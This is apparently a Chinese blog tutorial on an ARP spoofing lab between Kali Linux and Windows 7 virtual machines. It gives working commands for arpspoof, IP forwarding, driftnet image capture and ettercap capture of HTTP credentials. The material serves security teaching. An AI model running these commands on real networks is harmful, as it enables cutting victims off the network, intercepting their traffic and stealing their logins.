ARP欺骗

用户773039434152
176 阅读2分钟

一、实验原理

1、ARP(Address Resolution Protocol)

地址解析协议,是根据IP地址获取物理地址的一个TCP/IP协议

2、ARP欺骗

又称ARP毒化(ARP poisoning,网上上多译为ARP病毒)或ARP攻击,是针对以太网地址解析协议(ARP)的一种攻击技术,通过欺骗局域网内访问者PC的网关MAC地址,使访问者PC错以为攻击者更改后的MAC地址是网关的MAC,导致网络不通。此种攻击可让攻击者获取局域网上的数据包甚至可篡改数据包,且可让网上上特定计算机或所有计算机无法正常连线。

image.png 常见的ARP欺骗手法:同时对局域网内的一台主机和网关进行ARP欺骗,更改这台主机和网关的ARP缓存表。

二、实验环境

  • 软件:VMware Workstations14以上版本
  • 虚拟机:Kali-Linux、Windows 7

三、实验前期准备

1、安装dsniff

arpspoof 是 dsniff 的一个附属工具,所以我们需要安装的是 dsniff

apt-get install dsniff

企业微信截图_16924262773967.png

  • 更换更新源为阿里云,原有的更新源加#号注释 #vim /etc/apt/sources.list deb mirrors.aliyun.com/kali kali-rolling main non-free contrib deb-src mirrors.aliyun.com/kali kali-rolling main non-free contrib
  • 修改完成后执行apt-get update命令完成更新
  • 重新安装命令,apt-get install dsniff

2、安装driftnet

kali 中利用driftnet工具,可以捕获win7机器正在浏览的图片. Driftnet是一个监听网络流量并从它观察到的TCP流中提取图像的程序。

apt-get install driftnet

企业微信截图_16924443672597.png

四、ARP断网复现

1、查找kali的IP地址和MAC地址

ifconfig

image.png

2、查找win7的IP地址、MAC地址、网关地址

使用ipconfig指令查找对应的地址

ipconfig

企业微信截图_16924240929127.png 使用arp -a查找对应arp缓存表

arp -a

企业微信截图_16924241215733.png 通过网关的IP地址,找到对应的mac地址

3、主机扫描

这里扫描的是192.168.111.0/24网段的存活的

fping -g 192.168.111.0/24

image.png

4、断网攻击

  • arpspoof  -i   网卡  -t 目标ip   网关
  • -i后面的参数是网卡名称,-t后面的参数是目的主机和网关,截获目的主机发往网关的数据包
arpspoof -i eth0 -t 192.168.111.130 192.168.111.2

企业微信截图_16924275251505.png 开始攻击后,win7无法连接互联网

image.png 查看win7的arp缓存发现win7网关的物理地址已经发生变化

企业微信截图_16924275526602.png

五、ARP欺骗利用

与ARP断网不同的是,ARP欺骗不仅使目标ip的流量经过我的网卡,还要从网关出去

1、设置ip流量转发

echo 1 >/proc/sys/net/ipv4/ip_forward

image.png

2、在ARP欺骗前,查看是否可以正常上网

3、进行ARP欺骗

arpspoof -i eth0 -t 192.168.111.130 192.168.111.2

企业微信截图_16924275251505.png

4、使用driftnet工具捕获win7机器正在浏览的图片

driftnet -i eth0

企业微信截图_16925341111466.png

5、使用ettercap获取HTTP账户密码

ettercap -Tq -i eth0

企业微信截图_16924461276250.png 在win7浏览器登录界面输入账号密码

image.png 返回kali,可以查看到刚刚win7中的登录信息

企业微信截图_16924464973254.png

以上内容仅供网络安全学习,违者后果自负!!!

avatar
文章
阅读
粉丝